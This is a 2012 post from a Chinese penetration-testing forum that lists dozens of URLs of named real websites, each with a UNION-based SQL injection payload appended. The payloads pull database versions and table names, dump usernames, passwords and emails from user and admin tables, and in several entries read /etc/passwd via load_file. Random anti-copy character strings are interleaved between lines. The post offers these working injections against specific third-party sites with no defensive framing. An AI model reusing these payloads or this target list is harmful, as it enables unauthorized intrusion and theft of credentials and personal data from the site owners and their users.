中国网络渗透测试联盟
标题:
老外php灵活注入方法
[打印本页]
作者:
admin
时间:
2012-9-15 14:43
标题:
老外php灵活注入方法
灵活的php注入+活的实例演示! 老外那里挖的
& c A# v( Q0 ~2 h2 N1 Y5 d5 r# b
$ @' d" M* w& B& X, p
http://www.ihrc.org.uk/show.php?id=-99+UNION+ALL+SELECT+1
,2,version(),4,5,6,7,8,9,10,11,12,13--
$ N& g* h9 f6 q1 v8 E2 E' f
http://www.witchcraft.nu/newsitem.php?id=-99+UNION+ALL+SELECT+1
,version(),3,4,5,6,7,8,9,10--
# g+ {3 s3 x& w o4 S
http://ccsmi.fas.sfu.ca/newsItem.php?id=-99+UNION+ALL+SELECT+1
,2,3,version(),5,6,7,8--
7 z, c0 l, C1 x5 \. `
http://www.senesco.com/newsitem.php?id=-99+UNION+ALL+SELECT+1
,2,3,table_name,5%20from%20information_schema.tables%20where%20table_schema=database ()--
0 L& i. }; P7 T4 t% i+ d# q3 i
http://www.hpcalc.org/details.php?id=-99+UNION+ALL+SELECT+1
,concat_ws(0x3a,id,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29+from+users--
! A* i6 C; e0 M# L; H# w
http://www.atlmetal.com/bands/band.php?id=-99+UNION+ALL+SELECT+1
,version(),3,4,5,6,7,8,9,10,11,12,13,14--
; P0 T) W: M" Z) o9 p( w
http://www.rocklab.it/band.php?id=-99+UNION+ALL+SELECT+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
" `; h& h% W$ H! K, a, k( k/ F0 V1 V
http://www.bandlist24.de/band.php?id=-99+UNION+ALL+SELECT+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
( r# R9 P: C: U8 k+ S3 h
http://www.listenuppresident.com
... +UNION+ALL+SELECT+1,2,3,4,5,6,concat_ws(0x3a,Name,Email,Password),8+from+Members%20limit%20 1,1--
8 o* X9 I- ~& W9 [3 f9 H9 F# G
http://www.hamdrams.co.uk/admin.php?id=-99+UNION+ALL+SELECT+1
,2,concat_ws(0x3a,username,user_password),4,5,6,7,8,9,10,11%20from%20phpbb_users--
; o% f' Q6 ?& i. T! C/ a5 B
http://www.correiagroup.com/agent.php?id=-99+UNION+ALL+SELECT+1
,version(),3,4,5,6,7,8,9,10,11,12--
, S M; v! |. w+ E
http://www.eralincolnrealty.net/
... +UNION+ALL+SELECT+1,2,3,column_name,5,6,7%20from%20information_schema.columns%20where%20table_nam e='Agent'%20limit%205,1--
1 ]$ H- Q' M( |4 v5 M3 s
http://www.estatesmall.com/real-
... +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15--
+ H: ^% ?4 N8 q4 E3 ^0 f. u
http://www.fourstarrealty.com/agent.php?id=-99+UNION+ALL+SELECT+1
,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20admin--
) W# e/ Y+ L7 ?% K$ X$ H
http://www.rpmre.com/arealsys/agent.php?id=-99+UNION+ALL+SELECT+1
,version(),3,4,5,6,7,8,9,10,11,12,13--
# y( Y6 C( I9 N
http://internet-shares.com/users.php?id=-99+UNION+ALL+SELECT+1
,2,concat(username,0x3a,password,0x3a,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+users%20limit%201,1--
0 L3 |1 Q4 K; [
http://www.punkarchives.com/users.php?ID=-99+UNION+ALL+SELECT+1
,concat_ws(0x3a,username,password,Email),3,4,5,6+from+users--
* l% q* D; M& \- k! r% K
http://www.memfis.eu/ko7e7a/users.php?id=-99+UNION+ALL+SELECT+1
,2,concat_ws(0x3a,nick,name,email,text),4,5,6,7+from+users--
$ \3 z( E- k& [
http://www.listenuppresident.com
... +UNION+ALL+SELECT+1,2,3,4,5,6,concat_ws(0x3a,Name,Email,Password),8+from+Members%20limit%20 1,1--
/ r# {5 U, Y' }. C! |0 h
http://www.newportcoastbroker.co
... +UNION+ALL+SELECT+1,2,unhex(hex(load_file(0x2F6574632F706173737764)))%20from%20mysql.user--
2 G- z' l5 B$ A. l- U; J5 S
http://www.gamesector.org/review.php?id=-83+UNION+ALL+SELECT+1
,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10--
) U5 ^8 I0 Z/ k" r6 I- o
http://www.bgra.net/2004/review.php?id=-12+UNION+ALL+SELECT+1
,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26--
& P! D; h/ Y U4 {. \; @
http://www.btne.org/members.php?id=-6+UNION+ALL+SELECT+user
(),database(),version()--
7 \. |5 L% l2 a H P) K% \3 d7 @9 Y
http://cormaci.com/pat.php?id=-2+UNION+ALL+SELECT+1
,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10--
$ x( Q* R9 |: J, h0 ]8 }
http://www.punbb.fr/styles/style.php?id=-93+UNION+ALL+SELECT+1
,0x4E65757472616C69736564,database(),4,5,null,7,8,9--
/ z: y; F' r+ l) }& d2 U2 X4 {
http://www.punbb.fr/styles/style.php?id=-93+UNION+ALL+SELECT+1
,concat_ws(0x3a,username,password),database(),4,5,null,7,8,9+from+punbb_users+limit +1,1--
6 ]) i$ w& w( b9 O
http://travalor.com/hunt.php?id=-3+UNION+ALL+SELECT+1
,2,concat_ws(0x3a,username,password,email),4,5,6,7,8,9,10,11,12,13,14,15,16+from+users+limit +0,1--
+ U& w6 S' [2 r% ?
http://www.thefalesteam.com/sell.php?ID=-64+UNION+ALL+SELECT+1
,2,3,4,5,6,unhex(hex(concat_ws(0x3a,version(),user(),database()))),8,9,10,11,12--
1 N( Q: i3 L' F0 z5 k
http://www.loffice.org/affiliate
... +UNION+ALL+SELECT+1,concat_ws(0x3a,nom,adresse,tel,mail,password),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,6 4,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+membre+limit+0,1--
9 I3 ~3 z1 P, h1 _- W; o
http://haasbuilders.com/auth.php?id=-39+UNION+ALL+SELECT+1
,concat_ws(0x3a,project_id,project_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from +projects+where+project_id+=+36--
1 `1 H: h% H7 }
http://ocmusicfest09.com/artist/bio.php?id=-99+UNION+ALL+SELECT+1
,2,3,4,5,6,concat_ws(0x3a,user_name,password,password_hint),8,9,10,11,12,13+from +deleterec--
5 U. ?/ ?. C/ u. @( K3 w5 _
http://www.theatreview.org.nz/re
... +UNION+ALL+SELECT+1,2,3,4,5,concat_ws(0x3a,username,email,password),7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+members+limit+0,1--
2 z0 h& M4 A8 C/ F& X4 s9 {9 d' ]( {9 U
http://www.thebartend.com/drinks
... +UNION+ALL+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9--
: g/ B0 R. k w6 b) _
http://turfwars2.com/user.php?id=-30+UNION+ALL+SELECT+1
,concat_ws(0x3a,username,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users+limit+1,1--
6 R. } l+ _# Y3 X4 u
http://www.lingo.org.za/short.php?id=-40+UNION+ALL+SELECT+1
,2,3,4,5,unhex(hex(password)),7,8,9+from+user--
0 e% i) j. ?) a( x- n/ I- j
http://www.lfks.org/halloffame.php?id=-15+UNION+ALL+SELECT+1
,id,3,4,5,6,7+from+halloffame--
' o/ f" E9 L# l% \* k& Z. a( ^
http://www.spacefleetonline.com/
... LL+SELECT+concat_ws(0x3a,user_name,real_name,email,address,password)+from+user+limit+0,1 --
1 [; a) L: J0 b
https://www.ncsy.ca/email.php?id=-7+UNION+ALL+SELECT+1
,concat_ws(0x3a,version(),user(),database()),3--
5 R( F% B5 ]- j
http://www.beaufortbooks.com/books.php?id=-53+UNION+ALL+SELECT+1
,concat_ws(0x3a,username,password,email),3,4,5,6,7,8,9,10,11,12,13+from+users+lim it+0,1--
6 J' M" y+ x2 l4 \3 S, d% n
http://www.andytimmons.com/video.php?id=-0003+UNION+ALL+SELECT+1
,unhex(hex(concat_ws(0x3a,version(),user(),database()))),3,4,5,6,7,8--
$ a4 ~" S. u j$ O1 y
http://www.law-and-numbers.de/de
... +UNION+ALL+SELECT+1,null,3,null,0x4E65757472616C69736564,column_name,null,8,9+from+informatio n_schema.columns+limit+0,1--
: L$ [" T5 ^) v) A# J# b
http://www.uwtuib.com/members.php?id=53+UNION+ALL+SELECT+1
,2,concat_ws(0x3a,lname,password,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32+from+members+limit+0,1--
: {. p9 p$ r! H( L0 G
http://www.retailtherapy.tv/video.php?id=-163+UNION+ALL+SELECT+1
,2,3,concat_ws(0x3a,id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+members--
1 I( c' F& W% Z# }4 ` r
http://www.notbbc.co.uk/janet/ms
... +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex(concat_ws(0x3a,version(),user(),d atabase()))),14,15,16--
# L' Y! c7 W) F$ I! v7 w4 c. [8 Z5 N
http://www.visitmaldives.com/FAQ/faq.php?Id=-4+UNION+ALL+SELECT+1
,2,concat_ws(0x3a,username,password,email),4,5+from+users+limit+0,1--
8 V1 k w0 S+ A3 ]
http://www.fair-media.info/reque
... ON+ALL+SELECT+unhex(hex(concat_ws(0x3a,version(),user(),database()))),2--
% m/ @; T5 y. ~: ?$ C- e/ _
http://www.langsfordcenter.com/o
... +UNION+ALL+SELECT+1,2,concat_ws(0x3a,adminid,password)+from+admin_login+limit+2,1--
" Y b j' W% b' p- i4 d
http://supersport-ci.com/scan.php?id=-42+UNION+ALL+SELECT+1
,2,3,4,concat_ws(0x3a,version(),database(),user())--
: g# w( D r( b5 `7 ~/ M
http://www.thediamondworks.co.za
... +UNION+ALL+SELECT+1,2,version(),0x4E65757472616C69736564+from+admin--
' d5 _2 o% r! k* `
http://www.nortec.no/stjordal/pc.php?id=-41+UNION+ALL+SELECT+1
,2,table_name,4 from information_schema.tables where table_schema=database()--
3 ]4 }+ |0 d( {* R& \
http://www.webhoster4u.de/server
... +ALL+SELECT+version(),database()--
P$ _$ i- M6 f. q: ], C) k
http://ens.ewi.tudelft.nl/People
... +UNION+ALL+SELECT+1,2,3,4,5,table_name,7,8,9,10,11,12,13%20from%20information_schema.tables%20wher e%20table_schema=database()%20limit%200,1--
- C. h2 d v' K8 D7 p. \1 d% z
http://www.putridflowers.com/music.php?id=-17+UNION+ALL+SELECT+1
,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
$ Y' |; O6 W/ k) V+ p
https://shop.invictusnetworks.co
... +UNION+ALL+SELECT+1,database(),3,4,5,6,7,8,9,10,11,12--
. |( c p: h f+ U
http://sandiegoscreensavers.com/
... +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,concat_ws(0x 3a,discount_type,discount_category,discount_currpct,discount_value,discount_active,discount_ref,discount_expiration),77,78,79,80,81,82,83,84,85,86,87, 88+from+discount--
0 {( X ~. P; Q9 R5 o: k( G
http://www.schoolbytes.com/summary.php?id=-99+UNION+ALL+SELECT+1
,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+users--
8 S+ I$ h4 s, n9 Y6 p/ Y
http://www.toprightcorner.com/bio.php?id=-99+UNION+ALL+SELECT+1
,2,3,4,4--
, Z- C4 L; h5 o6 T
http://www.wang-li.com/art.php?id=-118+UNION+ALL+SELECT+1
,2,load_file(0x2F6574632F706173737764),4--
, k1 y; |! Y! C: K0 g. D5 I
http://www.twisterella.com/indie
... +UNION+ALL+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,0x4E65757472616C69736564,9,10, 11+from+users+limit+0,1--
& W1 H3 h) D# T# W
http://www.wan-t.cn/www/sec.php?id=-48+UNION+ALL+SELECT+1
,2,3,4,5,6,7,0x4E65757472616C69736564--
7 x0 s' p/ Q! p- M
http://www.womenastronomers.com/
... N+ALL+SELECT+concat(username,0x3a,passwor d),2,3,4+from+users---3+UNION+ALL+SELECT+1,null,0x4E65757472616C69736564,4,concat_ws(0x3a,version(),user(),database())--
1 T0 J! @) S1 L# _# L. p2 J8 v
http://www.fclarchives.org.nz/re
... N+ALL+SELECT+concat(username,0x3a,password),2,3,4+from+users--
# \1 H- o$ |; }) m, G
http://www.erdelyikopo.net/text/text.php?id=-5+UNION+ALL+SELECT+1
,2,3,4,5,6,7,8,concat_ws(0x3a,email,username,password,level)+from+members+limit+ 0,1--
1 ]2 N+ f! \, d, l6 B! v
http://eng.chiptronic.com/text.php?id=-9+UNION+ALL+SELECT+1
,2,3,4,5,6,column_name,8,9,10,11,12--
% L' w( i( o5 s/ m
http://www.bitepublishing.co.uk/
... +UNION+ALL+SELECT+1,concat_ws(0x3,user,pass,admin),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24+from+staff--
4 J. F. R/ _6 i& F( W
http://www.drivers-download.com/
... +UNION+ALL+SELECT+1,2,load_file(0x2F6574632F706173737764),4,5,6,7,8,9,10--
- L5 a4 w$ ~6 M+ W
http://www.consul.cc/email.php?id=-1068+UNION+ALL+SELECT+null
,concat_ws(0x3a,email,password),3,4,5+from+Users+limit+3,1--
3 s" Q) T7 ?2 H' I5 n c7 g
http://www.f1latam.com/esp.php?id=-8+UNION+ALL+SELECT+1
,0x4E65757472616C69736564,3,concat_ws(0x3a,version(),database(),user()),5,6--
) [; V$ X" g4 g6 M% P) B" x! Q
http://bia2.com/music-review/rev
... +UNION+ALL+SELECT+1,2,3,4,5,version(),7,8,9,10,11,12,13,14--
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2